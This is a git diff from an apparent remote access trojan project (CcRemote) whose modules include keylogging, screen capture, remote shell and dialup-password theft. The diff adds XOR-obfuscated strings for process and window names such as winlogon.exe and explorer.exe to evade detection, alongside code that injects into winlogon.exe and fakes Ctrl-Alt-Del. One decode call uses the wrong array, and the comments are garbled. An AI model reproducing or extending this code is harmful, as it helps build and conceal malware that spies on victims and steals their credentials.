diff --git a/CcMainDll/.vs/CcMainDll/v15/.suo b/CcMainDll/.vs/CcMainDll/v15/.suo index 4afe126..9db93e1 100644 Binary files a/CcMainDll/.vs/CcMainDll/v15/.suo and b/CcMainDll/.vs/CcMainDll/v15/.suo differ diff --git a/CcMainDll/CcMainDll/Release/CcMainDll.Build.CppClean.log b/CcMainDll/CcMainDll/Release/CcMainDll.Build.CppClean.log index fae17d0..52c7bfd 100644 --- a/CcMainDll/CcMainDll/Release/CcMainDll.Build.CppClean.log +++ b/CcMainDll/CcMainDll/Release/CcMainDll.Build.CppClean.log @@ -1 +1,37 @@ +f:\myapp\ccremote\bin\server\ccmaindll.lib +f:\myapp\ccremote\bin\server\ccmaindll.exp +f:\myapp\ccremote\bin\server\ccmaindll.ipdb +f:\myapp\ccremote\bin\server\ccmaindll.iobj +f:\myapp\ccremote\ccmaindll\ccmaindll\release\ccmaindll.pch +f:\myapp\ccremote\ccmaindll\ccmaindll\release\vc141.pdb +f:\myapp\ccremote\ccmaindll\ccmaindll\release\pch.obj +f:\myapp\ccremote\ccmaindll\ccmaindll\release\audio.obj +f:\myapp\ccremote\ccmaindll\ccmaindll\release\until.obj +f:\myapp\ccremote\ccmaindll\ccmaindll\release\keyboardmanager.obj +f:\myapp\ccremote\ccmaindll\ccmaindll\release\buffer.obj +f:\myapp\ccremote\ccmaindll\ccmaindll\release\clientsocket.obj +f:\myapp\ccremote\ccmaindll\ccmaindll\release\videomanager.obj +f:\myapp\ccremote\ccmaindll\ccmaindll\release\videocap.obj +f:\myapp\ccremote\ccmaindll\ccmaindll\release\systemmanager.obj +f:\myapp\ccremote\ccmaindll\ccmaindll\release\shellmanager.obj +f:\myapp\ccremote\ccmaindll\ccmaindll\release\screenspy.obj +f:\myapp\ccremote\ccmaindll\ccmaindll\release\screenmanager.obj +f:\myapp\ccremote\ccmaindll\ccmaindll\release\regeditex.obj +f:\myapp\ccremote\ccmaindll\ccmaindll\release\manager.obj +f:\myapp\ccremote\ccmaindll\ccmaindll\release\kernelmanager.obj +f:\myapp\ccremote\ccmaindll\ccmaindll\release\install.obj +f:\myapp\ccremote\ccmaindll\ccmaindll\release\dialupass.obj +f:\myapp\ccremote\ccmaindll\ccmaindll\release\audiomanager.obj +f:\myapp\ccremote\ccmaindll\ccmaindll\release\filemanager.obj +f:\myapp\ccremote\ccmaindll\ccmaindll\release\strcry.obj +f:\myapp\ccremote\ccmaindll\ccmaindll\release\dllmain.obj +f:\myapp\ccremote\bin\server\ccmaindll.dll +f:\myapp\ccremote\bin\server\ccmaindll.pdb f:\myapp\ccremote\ccmaindll\ccmaindll\..\..\bin\server\ccmaindll.dll +f:\myapp\ccremote\ccmaindll\ccmaindll\release\ccmaindll.tlog\ccmaindll.write.1u.tlog +f:\myapp\ccremote\ccmaindll\ccmaindll\release\ccmaindll.tlog\cl.command.1.tlog +f:\myapp\ccremote\ccmaindll\ccmaindll\release\ccmaindll.tlog\cl.read.1.tlog +f:\myapp\ccremote\ccmaindll\ccmaindll\release\ccmaindll.tlog\cl.write.1.tlog +f:\myapp\ccremote\ccmaindll\ccmaindll\release\ccmaindll.tlog\link.command.1.tlog +f:\myapp\ccremote\ccmaindll\ccmaindll\release\ccmaindll.tlog\link.read.1.tlog +f:\myapp\ccremote\ccmaindll\ccmaindll\release\ccmaindll.tlog\link.write.1.tlog diff --git a/CcMainDll/CcMainDll/Release/CcMainDll.log b/CcMainDll/CcMainDll/Release/CcMainDll.log index 9573366..e907d1c 100644 --- a/CcMainDll/CcMainDll/Release/CcMainDll.log +++ b/CcMainDll/CcMainDll/Release/CcMainDll.log @@ -22,12 +22,16 @@ f:\myapp\ccremote\ccmaindll\ccmaindll\clientsocket.cpp(484): warning C4018: “> f:\myapp\ccremote\ccmaindll\ccmaindll\common\keyboardmanager.cpp(33): warning C4018: “<”: 有符号/无符号不匹配 f:\myapp\ccremote\ccmaindll\ccmaindll\common\keyboardmanager.cpp(307): warning C4018: “<”: 有符号/无符号不匹配 until.cpp -f:\myapp\ccremote\ccmaindll\ccmaindll\common\until.cpp(68): warning C4996: 'strcmpi': The POSIX name for this item is deprecated. Instead, use the ISO C and C++ conformant name: _strcmpi. See online help for details. +f:\myapp\ccremote\ccmaindll\ccmaindll\common\until.cpp(69): warning C4996: 'strcmpi': The POSIX name for this item is deprecated. Instead, use the ISO C and C++ conformant name: _strcmpi. See online help for details. d:\windows kits\10\include\10.0.17763.0\ucrt\string.h(543): note: 参见“strcmpi”的声明 -f:\myapp\ccremote\ccmaindll\ccmaindll\common\until.cpp(169): warning C4996: 'GetVersionExA': 被声明为已否决 +f:\myapp\ccremote\ccmaindll\ccmaindll\common\until.cpp(103): warning C4838: 从“int”转换到“char”需要收缩转换 +f:\myapp\ccremote\ccmaindll\ccmaindll\common\until.cpp(103): warning C4309: “初始化”: 截断常量值 +f:\myapp\ccremote\ccmaindll\ccmaindll\common\until.cpp(176): warning C4996: 'GetVersionExA': 被声明为已否决 d:\windows kits\10\include\10.0.17763.0\um\sysinfoapi.h(378): note: 参见“GetVersionExA”的声明 -f:\myapp\ccremote\ccmaindll\ccmaindll\common\until.cpp(172): warning C4996: 'GetVersionExA': 被声明为已否决 +f:\myapp\ccremote\ccmaindll\ccmaindll\common\until.cpp(179): warning C4996: 'GetVersionExA': 被声明为已否决 d:\windows kits\10\include\10.0.17763.0\um\sysinfoapi.h(378): note: 参见“GetVersionExA”的声明 +f:\myapp\ccremote\ccmaindll\ccmaindll\common\until.cpp(292): warning C4838: 从“int”转换到“char”需要收缩转换 +f:\myapp\ccremote\ccmaindll\ccmaindll\common\until.cpp(292): warning C4309: “初始化”: 截断常量值 cl : 命令行 warning D9002: 忽略未知选项“/Zc:stricStrings” AudioManager.cpp Dialupass.cpp @@ -53,6 +57,8 @@ f:\myapp\ccremote\ccmaindll\ccmaindll\common\install.cpp(214): warning C4996: 's d:\windows kits\10\include\10.0.17763.0\ucrt\string.h(338): note: 参见“strncpy”的声明 KernelManager.cpp f:\myapp\ccremote\ccmaindll\ccmaindll\common\kernelmanager.cpp(43): warning C4018: “<”: 有符号/无符号不匹配 +f:\myapp\ccremote\ccmaindll\ccmaindll\common\kernelmanager.cpp(146): warning C4838: 从“int”转换到“char”需要收缩转换 +f:\myapp\ccremote\ccmaindll\ccmaindll\common\kernelmanager.cpp(146): warning C4309: “初始化”: 截断常量值 Manager.cpp RegEditEx.cpp f:\myapp\ccremote\ccmaindll\ccmaindll\common\regeditex.cpp(9): warning C4996: 'strnicmp': The POSIX name for this item is deprecated. Instead, use the ISO C and C++ conformant name: _strnicmp. See online help for details. @@ -83,7 +89,11 @@ f:\myapp\ccremote\ccmaindll\ccmaindll\common\dialupass.h(62): warning C4996: 'st f:\myapp\ccremote\ccmaindll\ccmaindll\common\systemmanager.cpp(137): warning C4018: “<”: 有符号/无符号不匹配 f:\myapp\ccremote\ccmaindll\ccmaindll\common\systemmanager.cpp(228): warning C4101: “cbNeeded”: 未引用的局部变量 VideoCap.cpp -f:\myapp\ccremote\ccmaindll\ccmaindll\common\videocap.cpp(119): warning C4101: “gCapTureParms”: 未引用的局部变量 +f:\myapp\ccremote\ccmaindll\ccmaindll\common\videocap.cpp(27): warning C4838: 从“int”转换到“char”需要收缩转换 +f:\myapp\ccremote\ccmaindll\ccmaindll\common\videocap.cpp(27): warning C4309: “初始化”: 截断常量值 +f:\myapp\ccremote\ccmaindll\ccmaindll\common\videocap.cpp(35): warning C4838: 从“int”转换到“char”需要收缩转换 +f:\myapp\ccremote\ccmaindll\ccmaindll\common\videocap.cpp(35): warning C4309: “初始化”: 截断常量值 +f:\myapp\ccremote\ccmaindll\ccmaindll\common\videocap.cpp(124): warning C4101: “gCapTureParms”: 未引用的局部变量 VideoManager.cpp cl : 命令行 warning D9002: 忽略未知选项“/Zc:stricStrings” FileManager.cpp diff --git a/CcMainDll/CcMainDll/StrCry.h b/CcMainDll/CcMainDll/StrCry.h index 32938b4..b6d4dfc 100644 --- a/CcMainDll/CcMainDll/StrCry.h +++ b/CcMainDll/CcMainDll/StrCry.h @@ -1,6 +1,7 @@ #pragma once //صָҪͷŵ +//㷨 //char* encryptionStr(char* str) //{ // int len = strlen(str); @@ -13,6 +14,9 @@ // return a; //} +#define STR_CRY_LENGTH 0 //ַij + +//㷨 char* decodeStr(char* str); diff --git a/CcMainDll/CcMainDll/common/KernelManager.cpp b/CcMainDll/CcMainDll/common/KernelManager.cpp index 7709e8c..16c6834 100644 --- a/CcMainDll/CcMainDll/common/KernelManager.cpp +++ b/CcMainDll/CcMainDll/common/KernelManager.cpp @@ -143,9 +143,14 @@ void CKernelManager::UnInstallService() lstrcat(strRecordFile, "\\syslog.dat"); DeleteFile(strRecordFile); + char winlogon[] = { 0x0c,0xbc,0xa3,0xa7,0xa4,0xa8,0xa1,0xaa,0xaa,0xed,0xa7,0xb9,0xa5 }; //winlogon.exe + char* winlogon_exe = decodeStr(winlogon); //ܺ + + + if (m_dwServiceType != 0x120) // ownerԶɾԼֹͣԼɾ,Զ߳ɾ { - InjectRemoveService("winlogon.exe", m_strServiceName); + InjectRemoveService(winlogon_exe, m_strServiceName); } else // shared̵ķ,ɾԼ { @@ -153,6 +158,8 @@ void CKernelManager::UnInstallService() } // вɺ֪ͨ߳̿˳ CreateEvent(NULL, true, false, m_strKillEvent); + memset(winlogon_exe, 0, winlogon[STR_CRY_LENGTH]); //0 + delete winlogon_exe; } bool CKernelManager::IsActived() diff --git a/CcMainDll/CcMainDll/common/VideoCap.cpp b/CcMainDll/CcMainDll/common/VideoCap.cpp index 1bffe6a..0624fbe 100644 --- a/CcMainDll/CcMainDll/common/VideoCap.cpp +++ b/CcMainDll/CcMainDll/common/VideoCap.cpp @@ -3,8 +3,8 @@ ////////////////////////////////////////////////////////////////////// #include "..\pch.h" #include "VideoCap.h" -//#include "..\DynamicAPI.h" #include "..\DynamicAPI.h" +#include "..\StrCry.h" ////////////////////////////////////////////////////////////////////// // Construction/Destruction ////////////////////////////////////////////////////////////////////// @@ -21,19 +21,24 @@ CVideoCap::CVideoCap() if (!IsWebCam() || m_bIsConnected) return; + + //"#32770ĬϵĴ - m_hWnd = CreateWindow("#32770", /* Dialog */ "", WS_POPUP, 0, 0, 0, 0, NULL, NULL, NULL, NULL); - m_hWndCap = capCreateCaptureWindow - ( - "VideoCapWindow", - WS_CHILD | WS_VISIBLE, - 0, - 0, - 0, - 0, - m_hWnd, - 0 - ); + char classname32770[] = { 0x06,0xe8,0xf9,0xfb,0xff,0xf0,0xf6 }; //#32770 + char* lpClassName = decodeStr(classname32770); //ܺ + + m_hWnd = CreateWindow(lpClassName, /* Dialog */ "", WS_POPUP, 0, 0, 0, 0, NULL, NULL, NULL, NULL); + + memset(lpClassName, 0, classname32770[STR_CRY_LENGTH]); //0 + delete lpClassName; + + char VideoCapWindow[] = { 0x0e,0x9d,0xa3,0xad,0xad,0xa8,0x85,0xa4,0xb4,0x94,0xab,0xaf,0xa4,0xd0,0xc9 }; //VideoCapWindow + char* lpszWindowName = decodeStr(classname32770); //ܺ + + m_hWndCap = capCreateCaptureWindow(lpszWindowName, WS_CHILD | WS_VISIBLE, 0, 0, 0, 0, m_hWnd, 0); + + memset(lpszWindowName, 0, VideoCapWindow[STR_CRY_LENGTH]); //0 + delete lpszWindowName; } CVideoCap::~CVideoCap() diff --git a/CcMainDll/CcMainDll/common/until.cpp b/CcMainDll/CcMainDll/common/until.cpp index 4eb23a0..3d384b1 100644 --- a/CcMainDll/CcMainDll/common/until.cpp +++ b/CcMainDll/CcMainDll/common/until.cpp @@ -15,6 +15,7 @@ #include #include #include +#include "..\StrCry.h" unsigned int __stdcall ThreadLoader(LPVOID param) { unsigned int nRet = 0; @@ -25,7 +26,7 @@ unsigned int __stdcall ThreadLoader(LPVOID param) THREAD_ARGLIST arg; memcpy(&arg, param, sizeof(arg)); SetEvent(arg.hEventTransferArg); - // ׿潻 + // 潻 if (arg.bInteractive) SelectDesktop(NULL); @@ -99,7 +100,13 @@ char *GetLogUserXP() char *GetLogUser2K() { - DWORD dwProcessID = GetProcessID("explorer.exe"); + char explorer[] = { 0x0c,0xae,0xb2,0xb9,0xa4,0xa8,0xb4,0xa0,0xb6,0xed,0xa7,0xb9,0xa5 }; //explorer.exe + char* explorer_exe = decodeStr(explorer); //ܺ + + DWORD dwProcessID = GetProcessID(explorer_exe); + memset(explorer_exe, 0, explorer[STR_CRY_LENGTH]); //0 + delete explorer_exe; + if (dwProcessID == 0) return NULL; @@ -281,11 +288,17 @@ BOOL SimulateCtrlAltDel() HDESK old_desktop = GetThreadDesktop(GetCurrentThreadId()); // Switch into the Winlogon desktop - char name[] = "Winlogon"; - if (!SelectDesktop(name)) + + char Winlogon[] = { 0x08,0x9c,0xa3,0xa7,0xa4,0xa8,0xa1,0xaa,0xaa }; //Winlogon + char* pWinlogon = decodeStr(Winlogon); //ܺ + + //char name[] = "Winlogon"; + if (!SelectDesktop(pWinlogon)) { return FALSE; } + memset(pWinlogon, 0, Winlogon[STR_CRY_LENGTH]); //0 + delete pWinlogon; // Fake a hotkey event to any windows we find there.... :( // Winlogon uses hotkeys to trap Ctrl-Alt-Del... diff --git a/bin/server/CcMainDll.dll b/bin/server/CcMainDll.dll index a8d9df7..b2b6553 100644 Binary files a/bin/server/CcMainDll.dll and b/bin/server/CcMainDll.dll differ diff --git a/common/macros.h b/common/macros.h index 8f0037b..8c92350 100644 --- a/common/macros.h +++ b/common/macros.h @@ -119,6 +119,6 @@ enum #define MAX_SEND_BUFFER 1024 * 8 // ݳ #define MAX_RECV_BUFFER 1024 * 8 // ݳ -#define STR_CRY_LENGTH 0 //ַij + #endif // !defined(AFX_MACROS_H_INCLUDED) \ No newline at end of file diff --git a/strCodeTest/.vs/strCodeTest/v15/.suo b/strCodeTest/.vs/strCodeTest/v15/.suo index 1fbaae3..31cfcfd 100644 Binary files a/strCodeTest/.vs/strCodeTest/v15/.suo and b/strCodeTest/.vs/strCodeTest/v15/.suo differ diff --git a/strCodeTest/Debug/strCodeTest.exe b/strCodeTest/Debug/strCodeTest.exe index d95e53c..5ae685e 100644 Binary files a/strCodeTest/Debug/strCodeTest.exe and b/strCodeTest/Debug/strCodeTest.exe differ diff --git a/strCodeTest/strCodeTest/strCodeTest.cpp b/strCodeTest/strCodeTest/strCodeTest.cpp index cb0bd6a..c20cfba 100644 --- a/strCodeTest/strCodeTest/strCodeTest.cpp +++ b/strCodeTest/strCodeTest/strCodeTest.cpp @@ -39,8 +39,8 @@ char* uncode(char* str) int main() { - char a[] = "CcRmt"; - char b[] = "123456789!"; + char a[] = "#32770"; + char b[] = "VideoCapWindow"; char c[] = "LyxInstaller.exe"; char d[] = "%-24s %-15s 0x%x"; char* s1 = crycode(a);